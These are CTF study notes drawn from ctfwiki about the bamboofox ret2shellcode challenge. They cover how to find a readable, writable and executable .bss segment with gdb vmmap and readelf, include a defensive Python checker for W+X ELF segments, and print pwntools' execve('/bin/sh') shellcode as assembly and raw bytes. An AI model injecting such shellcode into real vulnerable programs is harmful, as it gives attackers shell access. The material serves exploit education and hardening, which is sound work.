Examples from ctfwiki

ret2shellcode from bamboofox:

This requires a segment that is readable, writable and executable: the shellcode is written there and then executed.

This challenge actually uses a very simple approach: the shellcode is written straight into the .bss segment, and that segment is readable, writable and executable.

```
.bss:0804A065                 align 20h
.bss:0804A080 public buf2
.bss:0804A080 ; char buf2[100]
.bss:0804A080 buf2 db 64h dup(?) ; DATA XREF: main+7B↑o
.bss:0804A080 _bss ends
.bss:0804A080
```

Checking the permissions of each segment

Method one: debug in gdb, start the program, then run vmmap

.bss:0804A080 corresponds to the mapping 0x804a000 0x804b000 0x001000 rwx /home/ubuntu/shellcode/ret2shellcode

readable, writable and executable

```
gef➤  vmmap
[ Legend: Code | Heap | Stack ]
Start End Offset Perm Path
0x8048000 0x8049000 0x000000 r-x /home/ubuntu/shellcode/ret2shellcode
0x8049000 0x804a000 0x000000 r-x /home/ubuntu/shellcode/ret2shellcode
0x804a000 0x804b000 0x001000 rwx /home/ubuntu/shellcode/ret2shellcode
0xf7de5000 0xf7fba000 0x000000 r-x /lib/i386-linux-gnu/libc-2.27.so
0xf7fba000 0xf7fbb000 0x1d5000 --- /lib/i386-linux-gnu/libc-2.27.so
0xf7fbb000 0xf7fbd000 0x1d5000 r-x /lib/i386-linux-gnu/libc-2.27.so
0xf7fbd000 0xf7fbe000 0x1d7000 rwx /lib/i386-linux-gnu/libc-2.27.so
0xf7fbe000 0xf7fc1000 0x000000 rwx
0xf7fd0000 0xf7fd2000 0x000000 rwx
0xf7fd2000 0xf7fd5000 0x000000 r-- [vvar]
0xf7fd5000 0xf7fd6000 0x000000 r-x [vdso]
0xf7fd6000 0xf7ffc000 0x000000 r-x /lib/i386-linux-gnu/ld-2.27.so
0xf7ffc000 0xf7ffd000 0x025000 r-x /lib/i386-linux-gnu/ld-2.27.so
0xf7ffd000 0xf7ffe000 0x026000 rwx /lib/i386-linux-gnu/ld-2.27.so
0xfffdd000 0xffffe000 0x000000 rwx [stack]
```

Method two: readelf
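The check that method one (vmmap) and method two (readelf -l) do by hand, as an added example that is not part of the original notes: a small Python W^X audit that parses the ELF32 program headers and flags any LOAD segment that is both writable and executable, as well as a PT_GNU_STACK that asks for an executable stack. The ELF image it builds is constructed for this example only, with its LOAD segment placed at 0x804a000 to mirror the mapping above.

```python
import struct

# ELF32 program-header constants (values from the ELF specification).
PT_LOAD, PT_GNU_STACK = 1, 0x6474E551
PF_X, PF_W, PF_R = 1, 2, 4

def parse_phdrs(data):
    """Parse a little-endian ELF32 image; return (p_type, p_flags, p_vaddr, p_memsz) per program header."""
    if data[:4] != b"\x7fELF" or data[4] != 1 or data[5] != 1:
        raise ValueError("only little-endian ELF32 is handled here")
    (e_phoff,) = struct.unpack_from("<I", data, 28)
    e_phentsize, e_phnum = struct.unpack_from("<HH", data, 42)
    headers = []
    for i in range(e_phnum):
        fields = struct.unpack_from("<8I", data, e_phoff + i * e_phentsize)
        p_type, _off, p_vaddr, _paddr, _filesz, p_memsz, p_flags, _align = fields
        headers.append((p_type, p_flags, p_vaddr, p_memsz))
    return headers

def audit(data):
    """Report LOAD segments that are writable and executable, and an executable-stack request."""
    findings, saw_gnu_stack = [], False
    for p_type, p_flags, p_vaddr, p_memsz in parse_phdrs(data):
        perm = "".join(c if p_flags & f else "-" for c, f in (("r", PF_R), ("w", PF_W), ("x", PF_X)))
        if p_type == PT_LOAD and p_flags & PF_W and p_flags & PF_X:
            findings.append(f"W+X LOAD segment at 0x{p_vaddr:x} (memsz 0x{p_memsz:x}, {perm})")
        elif p_type == PT_GNU_STACK:
            saw_gnu_stack = True
            # On 32-bit x86 Linux an executable-stack request also sets READ_IMPLIES_EXEC,
            # which is why every readable mapping (.bss, libc data, stack) showed up as rwx in vmmap.
            if p_flags & PF_X:
                findings.append(f"PT_GNU_STACK asks for an executable stack ({perm})")
    if not saw_gnu_stack:
        findings.append("no PT_GNU_STACK header: loader falls back to an executable stack")
    return findings

def build_sample_elf(load_flags, stack_flags):
    """Constructed sample (not a real binary): minimal ELF32 with one PT_LOAD at 0x804a000 and one PT_GNU_STACK."""
    e_ident = b"\x7fELF" + bytes([1, 1, 1, 0]) + b"\x00" * 8  # ELFCLASS32, 2's complement LSB, version 1
    phdrs = [
        struct.pack("<8I", PT_LOAD, 0x1000, 0x804A000, 0x804A000, 0x100, 0x1000, load_flags, 0x1000),
        struct.pack("<8I", PT_GNU_STACK, 0, 0, 0, 0, 0, stack_flags, 0x10),
    ]
    # e_type=EXEC, e_machine=EM_386, e_version, e_entry, e_phoff=52, e_shoff, e_flags,
    # e_ehsize=52, e_phentsize=32, e_phnum, e_shentsize, e_shnum, e_shstrndx
    ehdr = e_ident + struct.pack("<HHIIIIIHHHHHH", 2, 3, 1, 0x8048000, 52, 0, 0, 52, 32, len(phdrs), 40, 0, 0)
    return ehdr + b"".join(phdrs)
```

On a real binary, `audit(open(path, "rb").read())` gives the same answer as reading the Flags column of `readelf -l`; a clean result means the .bss trick above has no rwx segment to land in.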

Shellcode-related functions in pwntools

shellcraft.sh(): the shellcode as assembly source

asm(shellcraft.sh()): the assembled shellcode as raw machine-code bytes (shown in hex)

```
shellcraft.sh()

/* execve(path='/bin///sh', argv=['sh'], envp=0) */
/* push b'/bin///sh\x00' */
push 0x68
push 0x732f2f2f
push 0x6e69622f
mov ebx, esp
/* push argument array ['sh\x00'] */
/* push 'sh\x00\x00' */
push 0x1010101
xor dword ptr [esp], 0x1016972
xor ecx, ecx
push ecx /* null terminate */
push 4
pop ecx
add ecx, esp
push ecx /* 'sh\x00' */
mov ecx, esp
xor edx, edx
/* call execve() */
push SYS_execve /* 0xb */
pop eax
int 0x80

asm(shellcraft.sh())
b'jhh///sh/bin\x89\xe3h\x01\x01\x01\x01\x814$ri\x01\x011\xc9Qj\x04Y\x01\xe1Q\x89\xe11\xd2j\x0bX\xcd\x80'
```